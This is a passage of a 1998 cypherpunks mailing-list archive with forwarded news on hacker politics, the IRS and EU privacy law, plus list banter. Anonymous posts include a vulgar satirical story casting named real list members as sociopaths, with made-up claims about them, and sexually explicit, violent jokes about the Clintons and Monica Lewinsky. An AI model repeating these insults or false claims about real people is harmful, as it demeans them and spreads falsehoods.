paying for things (remember TAP? TAP stands for Technological Assistance
Program; it was a newsletter put out by the Yippies that taught people how
to use technology to avoid paying for things.), and they had no problem
with breaking and entering or hacking a system if it meant they could spend
more time on the mainframe. 
 
They also tended to forget a lot of things. Who paid for all those
computers at Harvard, Cornell and MIT? Who funded ARPAnet? Could it be the
same folks who were busily napalming indigenous persons halfway around the
globe? And why were those computer labs shielded by 1" thick bullet-proof
plexiglass during the 1960s? The old school history is not as simple as it
sometimes appears. Yes, they were the geniuses who gave us the first PCs,
but along the way, they tended to be implicated in a lot of nasty business,
to most of which they were all too willing to turn a blind eye. 
 
I don't mean to suggest that old school hackers were not hackers, only that
they weren't all that different from the new schoolers that they like to
brands as criminals, crackers and the like. 
 
Where the old school seems to come off as (at best) forgetful, the new
school has shown a new kind of commitment, something that is virtually
unthinkable to hackers of yesteryear. 
 
The hackers of the late 1990s are becoming political. There is a new move
to group action, political involvement and intervention. 
 
Recently, seven members of the Boston hacker collective, the L0pht,
testified on Capitol Hill before the Senate Governmental Affairs Committee.
As Peter the Great described in his write-up of the testimony: "Mudge gave
a short, elegant statement which set the tone for the rest of the day's
talks. He expressed his hope for an end to the mutual animosity that has
long existed between the hacker community and the government and his
sincere desire that the ensuing dialogue would pave the way towards
civility and further collaboration between
the two sides. This was a beautiful moment. It was as if a firm hand of
friendship was being extended from the hacker community to the senate. I
was moved, truly." 
 
This is a gesture that would have been virtually unthinkable only a few
years ago. 
 
Even more dramatic is the fact that the Cult of the Dead Cow has a policy
on China. In part, that policy was used in their justification for the
release of Back Orifice, a computer security program that exploits
vulnerabilities in Windows 95 and 98 operating systems. According to the
cDc, Microsoft's decision to choose profit over human rights in supporting
trade with China implicates them in the politics of oppression. The cDc has
been working to support a group of Chinese dissidents, the Hong Kong
Blondes, who are learning to use encryption and hacking techniques to stage
interventions in Chinese governmental affairs to protest Chinese human
rights violations. 
 
 Most recently,  at home,  hackers have begun to band together in an effort
to raise public awareness about the imprisonment of Kevin Mitnick, a hacker
facing a 25-count federal indictment. Mitnick has been incarcerated for
three and a half years without a hearing and has had the evidence to be
brought against him withheld from discovery. In response to Miramax's
decision to film Mitnick's story, hackers have banded together, launching a
full-scale protest (among other things) in front of Miramax's offices in
New York. Their campaign also includes letter writing initiatives, the
distribution of "FREE KEVIN" bumper stickers, Web sites, T-shirts and even
an online ribbon campaign. Another group recently hacked the New York Times
Web site. 
 
The late 1990s marks a point in time when computers have begun to affect us
in undeniably political ways. The globalization of technology, coupled with
the power that the computer industry wields, makes hacking, in this day and
age, essentially a political act. Some of the effects can be seen in the
highly politicized trial of Kevin Mitnick and in the efforts to pass the
WIPO treaty, legislation that makes hacking (even legal experimentation) a
criminal act. 
 
The differences between old school and new school hackers are not as great
as they might appear or as they are often made out to be. If there are
differences, they reside in the fact that hackers today are stepping up 
and taking a kind of political responsibility that was altogether alien to
their predecessors. 
 
The future of hacking goes hand in hand with the future of technology. In
today's society we have passed the point where we can deny the import of
such action based on some nostalgic vision of our relationship to computers
and the world. It is high time that the hackers of yesterday take a long,
hard and sober look at their own history and begin to recognize the ways in
which the hackers of today are picking up and championing an agenda which
the old school hackers can no longer hide from. 

(c) Copyright 1998 Online Journalism Review

Doug Thomas is an Online Journalism Review staff columnist and a professor
at the Annenberg School for Communication. 
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 25 Sep 1998 23:34:06 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Oh, I feel sooooo much better now.....
Message-ID: <199809260435.VAA11846@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Oh, I feel sooooo much better now.....
Date: Fri, 25 Sep 1998 07:38:34 -0500
To: believer@telepath.com

Source:  Nando Net
http://www.nando.net/newsroom/ntn/politics/092498/politics4_13127_noframes.h
tml

IRS embarks on new era with taxpayer-friendly mission statement
Copyright (c) 1998 The Associated Press 

WASHINGTON (September 24, 1998 4:13 p.m. EDT http://www.nandotimes.com) --
The Internal Revenue Service adopted a new official mission statement
emphasizing that "service" is its primary job.

In another step toward becoming more taxpayer-friendly, the IRS announced
Thursday a new statement that will be featured on its 1998 tax
publications, displayed at IRS offices and put on its Internet Web site.

The statement says that the IRS mission is to "provide America's taxpayers
top quality service by helping them understand and meet their tax
responsibilities and by applying the tax law with integrity and fairness to
all."

This replaces a 1980s statement in which the first line stated that the
IRS's main job was to "collect the proper amount of tax revenue at the
least cost."

"Words alone aren't going to change the IRS, but this serves an important
purpose," said IRS Commissioner Charles O. Rossotti. "The mission statement
will be a reminder that we must be dedicated on a day-in, day-out basis to
serving taxpayers."

The change is one of many that have followed passage in Congress of an IRS
reform law aimed at moving the agency away from its heavy-handed past.

Copyright (c) 1998 Nando.net
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 25 Sep 1998 23:34:17 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Here it Comes! E-Privacy Dispute Could Go to WTO
Message-ID: <199809260435.VAA11857@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Here it Comes! E-Privacy Dispute Could Go to WTO
Date: Fri, 25 Sep 1998 15:12:58 -0500
To: believer@telepath.com

Source:  USIA
http://www.usia.gov/current/news/latest/98092502.clt.html?/products/washfile
/newsitem.shtml

25 September 1998 

ELECTRONIC PRIVACY DISPUTE COULD GO TO WTO, EXPERT SAYS 

(U.S., EU still working for resolution)  (510)
By Bruce Odessey
USIA Staff Writer

Washington -- The U.S. complaint against European Union (EU) policy on
electronic privacy could eventually wind up in the World Trade
Organization (WTO), a Brookings Institution scholar says.

Robert Litan, director of Brookings' economic studies program, said he
could not predict what action the EU will take when its directive on
data protection -- opposed by the United States -- enters into force
in October.

At a September 24 meeting of the Coalition of Service Industries (CSI)
he speculated on some of the potential outcomes, however.

At issue is the EU directive restricting the collection and use of
personal information on the Internet. Most contentious is a provision
prohibiting electronic transmission of personal information about EU
citizens to countries that lack "adequate" privacy protection.

Enforcement of that provision might mean, for example, that EU
authorities might block U.S. companies in Europe from communicating
electronically with their offices in the United States.

Co-author of a forthcoming book on the electronic privacy issue, Litan
guessed that, if the two sides cannot resolve the dispute, the EU
might test its directive by imposing data embargoes on specific U.S.
business sectors or on certain business practices.

He noted that EU authorities have requested staff reports on four
sensitive related issues: medical information, electronic commerce,
airline reservations and personnel records.

Litan also identified four service sectors he considered especially
vulnerable to the directive: banking, insurance (especially health
insurance), investment banking (especially merger and acquisition
financing) and accounting.

If the dispute ends up before a WTO panel, he said, the two sides
could pick their arguments from different parts of the General
Agreement on Trade in Services (GATS). He said the EU could base its
argument on Article XXIV, which allows governments to protect the
privacy of their nationals.

The United States could base its argument on Article XXII, which
prohibits discrimination against foreign providers, he said.

In contrast with the EU, the Clinton administration has been pressing
in the WTO and other multilateral and regional groups for minimal
government regulation of electronic commerce. The administration has
encouraged the emerging U.S. industry to engage in self-regulation
instead.

Litan said EU authorities have choices on whether to enforce the EU
directive in a more or less intrusive way. For one example, they could
distinguish between business and other personal information, he said.

For another, he said, they could offer "safe harbor" exemptions for
corporate communications, or for certain industries, or for certain
equipment like laptop computers.

He said big multinational companies will somehow cope with the EU
directive, however it is enforced, possibly by entering into contracts
with the EU.

But Litan could not guess how small and medium-sized U.S. companies
could afford the expense of working out special arrangements with EU
authorities or how those authorities could enforce the directive
against small companies doing business in cyberspace.

"It's hopeless," he said.
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 25 Sep 1998 15:44:42 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199809252034.WAA19047@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 24 Sep 1998 21:43:34 -0400 "Edwin E. Smith" <edsmith@IntNet.net>
writes:
>
>
>
>If you have Microsoft Word (6.0 or later), and have a thesaurus
>installed, do the following:
>
>1) Open a new, blank document.
>2) Type in the words: I'd like to see Bill Clinton resign.
>3) Highlight the entire sentence.
>4) Click on the tools menu and select thesaurus (tools, language,
>   thesaurus)
>
>Look what is immediately highlighted in the selection box. 
>

This was almost funny. Too bad the following sentences also work:
I'd like to drink frog urine
I'd like to hug large, purple dinosaurs
I'd like to cook onions with garlic and tomatoes
I'd like to strangle you with a mouse cable




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 25 Sep 1998 16:41:14 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199809252130.XAA24262@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



                       Flowers for Alger Anon
                                       - FPP#3

  The two youths ducked quickly behind a tree to avoid
being spotted by the senile old fart who had finally given up
on finding his shoes and climbed barefoot up the step-ladder
to begin drilling out the cannon muzzle on the War Surplus
Army Tank he had recently acquired.
  As he labored he mumbled grouchily to himself about
how he was going to "show that Commie Bastard, Igor", and all
of the other former residents of The Home(TM) what he thought
of their efforts to take over "his" CypherPunks Mailing List.

  "Distributed, my ass!" the old fart scowled as he
climbed down the ladder, then grinned madly as he patted the
stack of shells sitting next to the tank.
  "I'll distribute those bastards...They should'a
Checked The Archives", he said, pausing to scratch his head
and add, "TradeMark". Then continuing, "before they fucked
with me. Then they'da seen how I ChopChopped them Torah-
Torah Bastards when they tried to muscle in on my list."

  "It's 'mine'!" the grouchy, paranoid old fart shouted,
turning his head around quickly in all directions, as if
challenging, and half-expecting, Unseen Beings to dispute
his claim.

  The two youngsters ducked and tried not to giggle
as they ran down the hill, finally collapsing on the dirt
road near the bottom and venting their laughter.

  Tim C. May was the most hilarious of the Cypher
Punks they'd investigated so far, but 'all' of the CPUNX
were "more than suitable", as Carol Anne Cypherpunk had
declared while they were evaluating Jim Choate, "for slicing
and buttering, and placing on a tray of Christmas snacks."
  Blanc Weber had agreed heartily with the new
coconspirator (sometimes spelled with a hyphen), in their
'Quest to Question Anonymity', as the Army o' Dog-Bitch
Battallion Warrior Godesses, as they had proclaimed them-
selves, had Code Named their Chosen Mission From Dog.

  Carol Anne, choosing Androgyny over Anonymity,
changed her name to Carroll for The Mission, vowing to
balance the Tao by taking on any tasks requiring "male
energy", which, on a CypherPunks Mission From Dog(TM),
Carroll stated with a straight face, might include
"blowing Dimitri".
  The Girls(Maybe) split a gut laughing over Blanc's
reply that, being of a more peaceful nature than the 'Nuke
DC Clique', they might have to "blow" their way out of
dangerous situations by the use of Soft Targets rather
than with Heavy Weaponry.
  Then they decided to get serious, before they, too,
became candidates for The Home.


  Blanc Weber, a veteran Cypher Punk Cult of One
Neophyte(TM) had felt slighted when the Author, a relative
newcomer to the CPUNX list (at least under his 'TOTO' persona),
had chosen to initiate two male Cypher Punks, Back and
McCrackin, into his 3-Entity Circle of Eunuchs Gorilla Cell,
instead of including Blanc, who had established a fairly
close rapport with TOTO in their private email exchanges.
   Even more to Blanc's surprise, disappointment,
and suspicion, TOTO failed to respond even to her offer to
engage in joint Army of Dog Maneuvers with him across various
Electronic Boundaries of the InterNet.  She had begun to
suspect that TOTO's lack of response to her Digital Warrior
overtures were the result of something more sinister than
simple male chauvinism.
   Her suspicions were confirmed when she caught up
with TOTO, using his CJ Parker alias, at Defcon 6.0, as he

was Pontificating, under the guise of 'Chief Cypher Punks
Spokes Person', on the 'Anonymizer', for a guillible group
of young hackers.
   "It is run by a HedgeHog riding Lance's Coat Tails,
since Lance invented that thing that hangs on the back of
toilet bowls, and the Anonymizer is the Blue Thing that
hangs on the back of the hard drive.
   Blanc, stunned that TOTO, who claimed to be the
Author, was a Total Fucking Moron (TM), listened as he
continued .
   "The Anonymizer prevents Peeping TOMS from being
able to tell whose hairy dick is making a bad smell on the
carpet of the recipient's computer, after No Mail from
NoBody comes out of the Email Chutechute.
  Blanc realized that CJ Parker was also a Total
Fucking Lunatic(TM) as he glanced furtively around to
whisper a dire warning to the spellbound young hackers
hanging on his everyword.
  "And the Peeping Toms are everywhere.
  "As a matter of fact", he added glancing quickly
over both shoulders, "when you can't see them at all..."
he paused for effect, "...then you know that they're 'good'".
  "Real good", he added, turning to direct his
wild-eyed stare at Blanc, who had just finished going
through his knapsack while he was distracted.
  Blanc had hurried away, deeply disturbed by what
she had found in TOTO's bag.  It wasn't just stationery
from The Home--it was 'personalized' stationery from
The Home for the Criminally Insane.
  Blanc Weber's confusion and suspicions deepened
when her attempts to warn other CPUNKS about TOTO were
ignored by all except the few apparent females on the list,
such as Carol Anne Cypherpunk and World Renowned Bottle
Collector Lynn Harrison (who was long rumored to have
joined the male-dominated mailing list only as a forum
to trade her panties to young CPUNX in the throbbing
throes of puberty, in return for the Standard Issue Klien
Bottles, they received upon joining the Digital Anarchist
Union, Local 01, rumored to be headquartered in Bienfait,
Saskatchewan).
  When The Girls(Maybe) of the Bitch Battallion took
to the road to investigate the remaining CypherPunks, they
quickly discovered that 'all' of the verifiable Meat Space
Personalities they positively linked to the various
Cyperpunks Consistent Net Personas (TM) were, in fact,
certifiably Cuckoo Cock Suckers(TM) in MeatSpace Reality.
With the only readily apparent link between them being
their connection to the Home for the Criminally Insane.
  Some of the MeatSpace Personalities behind the
Digital Personas on the CPUNX Mailing List--Ian Goldberg,
Alec de Jeune, Ulf Moeller, Peter Trei and Jim Choate--were
Highly Social Sociopaths, capable of putting ona suit and
tie, if need be, and glad-handing business people and
purchasing agents (all the while slitting their sleeping
throats, in the Dark Corners of their mind).
  John Gilmore, Declan McCullagh, Robert Hettinga,
Vin McClellan, even Froomkin--all of the Mainstream
Dream/Actively Connected To Society/Cypherpunks MeatSpace
Verifiable Identities, without fail, shared the same
connection to The Home as id the Lithium Dream/Social
Outcast CPUNX Meatballs such as T.C. May, A.T. Hun,
Wm Geiger III, S. Sequencr, JYA, and the late Dale Thorn
(whose mysterious death was rumored to be the work of the
Shadowy Figures(TM) lurking behind the ctrl-alt-delete.com
website).
  Blanc and Carroll watched in total amazement as
Jim Choate's ludicrous/inane computer and business theories
seemed to be somehow transformed, by unseen hands working
behind the scenes, into fully functional and viable
RealWorld(TM) concepts, in Choate's work with the Armadillo
Group.  The Unseen Hands made The Girls(Maybe) very, very
nervous.
  What pushed the Army of Dog-Bitch Battalion
Warrior Godesses beyond nervousness, toward Paranoia & Fear,
was the fact that the MeatSpace Personalities behind the
Digital Personas of the CypherPunks inevitably appeared
to be verifiable outside of The Home 'only after the
CPUNKS PERSONA'S original appearance on the mailing list'.
  A Cloaked Anonymous Random Source(TM) that The
Girls(Maybe) knew only as Digital Throat, speaking to
Larynx in an UnderGround Reptilian Nazi Parking Garage
in DC (after having been fooled into believing she was
talking to Defcon McCullagh Chain Saw). told them,
"I was the head of the Personelle Department at Intel,
at the time Tim May claims to have been there.
  "Even though we couldn't spell the name of our
Department right, let alone the names of the employees,
I never forget a face, and Tim C. May definitely was
never employed at Intel.
  "As a matter of fact", Digital Throat revealed,
"when Intel's Legall Department sent Mr. May a letter
that warned him to Cease & Decist with his claims, he
showed up on our doorstep, barefoot, in a MailMan's Uniform,
with a Veritable ShitLoad(TM) of heavy weapons and arms,
and, after that, as far as most of us were concerned,
if Tim c. May said he was the goddam 'President' of
Intel, then he was the goddam President--end of story."
  Blanc Weber and Carol Anne Cypherpunk found the
same patterns repeated time and again in their investiga-
tions of CypherPunks MeatSpace Ident Histories.
  Records, Information and Data-- such as birth
certificates, school records, credit and employment
histories-- were not only 'existant', but were inevitably
'consistent' with claims made in posts to the CPUNKS
mailing list, in regard to the MeatSpace Ident Histories
behind the Digital Personas.
  However, once The Girls(Maybe) had begun
researching the Human Historical Records of the MeatSpace
Ident Histories--speaking to alleged friends, family,
coworkers, and the like--the paper Trails quickly
unravelled, and the Physical Ident Histories of ALL of
the male subscribers to the CypherPunks Disturbed Male
LISP were, in the end, traceable 'only' back to the Home...

<EOF>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 25 Sep 1998 16:41:25 +0800
To: cypherpunks@toad.com
Subject: Re:
Message-ID: <199809252131.XAA24463@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



How about:

I'd like humping your mom with a prosthetic limb.
I'd like Hillary to get down on both knees and eat out Monica's ass.
I'd like nothing more than for anyone who even thinks about mentioning
Bill Clinton to spontaneously combust, preferably right in front of a gas
pump where his whole family is sitting in some sort of catatonic stupor,
unable to digest any information beyond that which The Machine feeds
them every day.

Who the fuck wouldn't drink to that?  For Christ's sake, I'd be buying!


At 10:34 PM 9/25/98 +0200, Anonymous wrote:
>On Thu, 24 Sep 1998 21:43:34 -0400 "Edwin E. Smith" <edsmith@IntNet.net>
>writes:
>>
>>
>>
>>If you have Microsoft Word (6.0 or later), and have a thesaurus
>>installed, do the following:
>>
>>1) Open a new, blank document.
>>2) Type in the words: I'd like to see Bill Clinton resign.
>>3) Highlight the entire sentence.
>>4) Click on the tools menu and select thesaurus (tools, language,
>>   thesaurus)
>>
>>Look what is immediately highlighted in the selection box. 
>>
>
>This was almost funny. Too bad the following sentences also work:
>I'd like to drink frog urine
>I'd like to hug large, purple dinosaurs
>I'd like to cook onions with garlic and tomatoes
>I'd like to strangle you with a mouse cable
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Fri, 25 Sep 1998 18:06:18 +0800
To: danmcd@Eng.Sun.COM
Subject: Re: 40-bit brute force RC4 speed records?
In-Reply-To: <199809251826.LAA09275@kebe.eng.sun.com>
Message-ID: <199809252244.XAA04853@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




> Just curious, what's the speed record?  What if I had, oh, say, a 4-way Ultra
> Enterprise 450 at my disposal?

A Maspar: 1.5M keys/sec 

see:

	http://www.dcs.ex.ac.uk/~aba/ssl/

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Sat, 26 Sep 1998 01:46:16 +0800
To: cypherpunks@Algebra.COM
Subject: Re: arms collectors...
In-Reply-To: <19980925195613.A3801@die.com>
Message-ID: <v03130300b2323d972f59@[209.66.100.156]>
MIME-Version: 1.0
Content-Type: text/plain



At 4:56 PM -0700 9/25/98, David Emery wrote:

>Washington Times, 25 Sep 98
>Operable missile seized in customs
>By Bill Gertz THE WASHINGTON TIMES
>
>U.S.  and British authorities are investigating how a Russian-design
>Scud missile was imported illegally by a weapons collector in
>California, The Washington Times has learned.
....
>British customs officials are investigating the seller, a small firm
>outside London, and U.S.  investigators are questioning an arms
>collector from Portola Valley, Calif., near Palo Alto, who bought the
>system, Mr.  Hensley said.
.....
>The officials identified the buyer only as a wealthy man who is a U.S.
>citizen.  He is a legitimate arms collector -- apparently not linked to
>terrorists or illicit arms dealers.  But the false paperwork has raised
>questions about the deal and prompted the U.S. investigation.

I know someone who is good friends with this guy. My friend is a
commodities broker who is active in gun shows and in weapons dealing. The
guy mentioned above has a couple of working tanks at this ranch up in
Portola Valley, tanks which he drives around. And lots of other weapons. I
was supposed to go on a shoot with this bunch a while back, but I couldn't
make it.

His Scud missile is unlikely to have been planned for any real use. Maybe
they think that with the First Criminal's spawn enrolled in the school down
Alpine Road that he's some kind of threat.

I could say more, but then I'd have to kill everyone who reads the list.

--Tim May

(This space left blank pending determ. of acceptability to the gov't.)
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 25 Sep 1998 18:55:44 +0800
To: cypherpunks@cyberpass.net
Subject: No Subject
Message-ID: <199809252358.BAA03888@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



"More importantly, as Noam Chomsky points out in "Manufacturing Consent",
lying politicians are the modern democratic equivalent of feudal tyrants
beating or executing citizens in more "uncivilized times".  "

Zappa said politics was the entertainment branch of industry.








  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Soren <sorens@workmail.com>
Date: Sat, 26 Sep 1998 05:59:44 +0800
To: cypherpunks@cyberpass.net
Subject: Re: IP: Oh, I feel sooooo much better now.....
In-Reply-To: <199809260435.VAA11846@netcom13.netcom.com>
Message-ID: <360CCAAC.AA4D6B9@workmail.com>
MIME-Version: 1.0
Content-Type: multipart/signed; boundary="Boundary..3996.1071713803.multipart/signed"

--Boundary..3996.1071713803.multipart/signed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit



Vladimir Z. Nuri wrote:

> ... The statement says that the IRS mission is to "provide America's taxpayers
>
> top quality service by helping them understand and meet their tax
> responsibilities and by applying the tax law with integrity and fairness to
> all." ...

While the IRS may be a law unto themselves, congress has not passed any "tax
law".  The IRS Code arises from the Federal Register, which does not make it a
law, merely a presidential dictate. Something like the divine right of kings.


--Boundary..3996.1071713803.multipart/signed
Content-Type: application/octet-stream; name="bin00007.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00007.bin"
Content-Description: "S/MIME Cryptographic Signature"

MIIL0wYJKoZIhvcNAQcCoIILxDCCC8ACAQExCzAJBgUrDgMCGgUAMAsGCSqG
SIb3DQEHAaCCCXEwggLwMIICWaADAgECAgIiCjANBgkqhkiG9w0BAQQFADCB
yDELMAkGA1UEBhMCWkExFTATBgNVBAgTDFdlc3Rlcm4gQ2FwZTEUMBIGA1UE
BxMLRHVyYmFudmlsbGUxGjAYBgNVBAoTEVRoYXd0ZSBDb25zdWx0aW5nMTMw
MQYDVQQLEypDZXJ0aWZpY2F0ZSBTZXJ2aWNlcyBSU0EgSUsgMTk5OC4yLjI1
IDg6MzUxOzA5BgNVBAMTMlRoYXd0ZSBQZXJzb25hbCBGcmVlbWFpbCBSU0Eg
SXNzdWluZyBLZXkgMTk5OC4yLjI1MB4XDTk4MDUwMTE0MzEzMFoXDTk5MDUw
MTE0MzEzMFowWTEzMDEGA1UEAxYqVGhhd3RlIEZyZWVtYWlsIE1lbWJlciBz
b3JlbnNAd29ya21haWwuY29tMSIwIAYJKoZIhvcNAQkBFhNzb3JlbnNAd29y
a21haWwuY29tMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC/Glch6AWt
vdTCMryo76FdpbCFjxl1YhIaMP+Ys/StMsCYtwGcNTsRqyGqwGMV6r2ZmPYa
Y6Veb7cPuEOsrN9OHuDiv/285Ip40sdsQD2eUEKVQoMNrUevkwxFCnFzFF5C
JHvvfVNkPw8Pl9up8hMNkSpNUdZM5hy5+zjFwrWQ5wIDAQABo1cwVTAUBglg
hkgBhvhCAQEBAf8EBAMCBaAwDgYDVR0PAQH/BAQDAgWgMAwGA1UdEwEB/wQC
MAAwHwYDVR0jBBgwFqAU7TQXbg4rXkuHmJG4N6eYv5IfrHIwDQYJKoZIhvcN
AQEEBQADgYEAAbA+57BV6kVH6veZ3HPtOFaO3yd3l3p3mWqECTLjxVp4tjpJ
QS26rBjmlzRk8Zzohb86bZ7zN74JnowlYJscmwwtP7tvy0B2gKDRkjN360HC
ySLXA8J7Ys2U+U2TgxTpgK1gbxfBw9jNoigvvq2gTWT5WtYG93TLgoaF/EV1
7SowggNIMIICsaADAgECAgEIMA0GCSqGSIb3DQEBBAUAMIHRMQswCQYDVQQG
EwJaQTEVMBMGA1UECBMMV2VzdGVybiBDYXBlMRIwEAYDVQQHEwlDYXBlIFRv
d24xGjAYBgNVBAoTEVRoYXd0ZSBDb25zdWx0aW5nMSgwJgYDVQQLEx9DZXJ0
aWZpY2F0aW9uIFNlcnZpY2VzIERpdmlzaW9uMSQwIgYDVQQDExtUaGF3dGUg
UGVyc29uYWwgRnJlZW1haWwgQ0ExKzApBgkqhkiG9w0BCQEWHHBlcnNvbmFs
LWZyZWVtYWlsQHRoYXd0ZS5jb20wHhcNOTgwMjI1MDgzNTMzWhcNMDAwMjI1
MDgzNTMzWjCByDELMAkGA1UEBhMCWkExFTATBgNVBAgTDFdlc3Rlcm4gQ2Fw
ZTEUMBIGA1UEBxMLRHVyYmFudmlsbGUxGjAYBgNVBAoTEVRoYXd0ZSBDb25z
dWx0aW5nMTMwMQYDVQQLEypDZXJ0aWZpY2F0ZSBTZXJ2aWNlcyBSU0EgSUsg
MTk5OC4yLjI1IDg6MzUxOzA5BgNVBAMTMlRoYXd0ZSBQZXJzb25hbCBGcmVl
bWFpbCBSU0EgSXNzdWluZyBLZXkgMTk5OC4yLjI1MIGfMA0GCSqGSIb3DQEB
AQUAA4GNADCBiQKBgQDHMcPEG5kjctJRhZVM41mS5OhsgbX0G18J5sSts0Rv
qjjXV+Swxcu6dK5MYSMkdgb42V0NiiiytCvtDbtSJPS3xUmng2P8CgSw74Eo
9+aRxk2X7pJ2JmLIYzd2PLGSD9ytUgaKccU3MWqG270IaShZ/O3HfSZn3U3e
08UC/ne24QIDAQABozcwNTASBgNVHRMBAf8ECDAGAQH/AgEAMB8GA1UdIwQY
MBagFHJJwnM0xlX0C3ZygX539IfnxrIOMA0GCSqGSIb3DQEBBAUAA4GBAELq
7YthfqHUXFKpPL2enHnoCYsSga2PHVpG7fElJlvIrv16IRbNoB47lzOD+043
KiiXpkj1KBgCJHyAe1NQtftvmvxtqlwmRagvNiJY0xsCAx/ulDnw/jRaiEsb
PYzz137Tn3BbdvbYxOK2PCSdCSWMWbHUi/P8BIIOnimGbMX/MIIDLTCCApag
AwIBAgIBADANBgkqhkiG9w0BAQQFADCB0TELMAkGA1UEBhMCWkExFTATBgNV
BAgTDFdlc3Rlcm4gQ2FwZTESMBAGA1UEBxMJQ2FwZSBUb3duMRowGAYDVQQK
ExFUaGF3dGUgQ29uc3VsdGluZzEoMCYGA1UECxMfQ2VydGlmaWNhdGlvbiBT
ZXJ2aWNlcyBEaXZpc2lvbjEkMCIGA1UEAxMbVGhhd3RlIFBlcnNvbmFsIEZy
ZWVtYWlsIENBMSswKQYJKoZIhvcNAQkBFhxwZXJzb25hbC1mcmVlbWFpbEB0
aGF3dGUuY29tMB4XDTk2MDEwMTAwMDAwMFoXDTIwMTIzMTIzNTk1OVowgdEx
CzAJBgNVBAYTAlpBMRUwEwYDVQQIEwxXZXN0ZXJuIENhcGUxEjAQBgNVBAcT
CUNhcGUgVG93bjEaMBgGA1UEChMRVGhhd3RlIENvbnN1bHRpbmcxKDAmBgNV
BAsTH0NlcnRpZmljYXRpb24gU2VydmljZXMgRGl2aXNpb24xJDAiBgNVBAMT
G1RoYXd0ZSBQZXJzb25hbCBGcmVlbWFpbCBDQTErMCkGCSqGSIb3DQEJARYc
cGVyc29uYWwtZnJlZW1haWxAdGhhd3RlLmNvbTCBnzANBgkqhkiG9w0BAQEF
AAOBjQAwgYkCgYEA1GnX1LCUZFtx6UfYDFG26nKRsIRefS0Nj3sS34UldSh0
OkIsYyeflXtL734Zhx2G6qPduc6WZBrCFG5ErHzmj+hND3EfQDimAKOHePb5
lIZererAXnbr2RSjXW56fAylS1V/Bhkpf56aJtVquzgkCGqYx7Hao5iR/Xnb
5VrEHLkCAwEAAaMTMBEwDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQQF
AAOBgQDH7JJ+Tvj1lqVnYiqk8E0RYNBvjWBYYawmu1I1XAjPMPuoSpaKH2JC
I4wXD/S6ZJwXrEcp352YXtJsYHFcoqzceePnbgBHH7UNKOgCneSa/RP0ptl8
sfjcXyMmCZGAc9AUG95DqYMl8uacLxXK/qarigd1iwzdUYRr5PjRzneigTGC
AiowggImAgEBMIHPMIHIMQswCQYDVQQGEwJaQTEVMBMGA1UECBMMV2VzdGVy
biBDYXBlMRQwEgYDVQQHEwtEdXJiYW52aWxsZTEaMBgGA1UEChMRVGhhd3Rl
IENvbnN1bHRpbmcxMzAxBgNVBAsTKkNlcnRpZmljYXRlIFNlcnZpY2VzIFJT
QSBJSyAxOTk4LjIuMjUgODozNTE7MDkGA1UEAxMyVGhhd3RlIFBlcnNvbmFs
IEZyZWVtYWlsIFJTQSBJc3N1aW5nIEtleSAxOTk4LjIuMjUCAiIKMAkGBSsO
AwIaBQCggbEwGAYJKoZIhvcNAQkDMQsGCSqGSIb3DQEHATAcBgkqhkiG9w0B
